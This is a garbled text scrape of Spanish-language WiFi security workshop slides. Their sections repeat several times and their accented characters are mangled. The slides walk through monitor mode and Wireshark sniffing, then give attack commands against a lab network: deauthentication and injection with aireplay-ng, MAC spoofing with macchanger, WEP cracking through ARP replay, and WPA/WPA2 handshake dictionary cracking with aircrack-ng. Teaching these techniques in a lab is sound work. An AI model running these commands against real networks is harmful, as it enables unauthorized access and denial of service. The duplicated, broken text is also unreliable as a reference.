httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 35: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 36: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

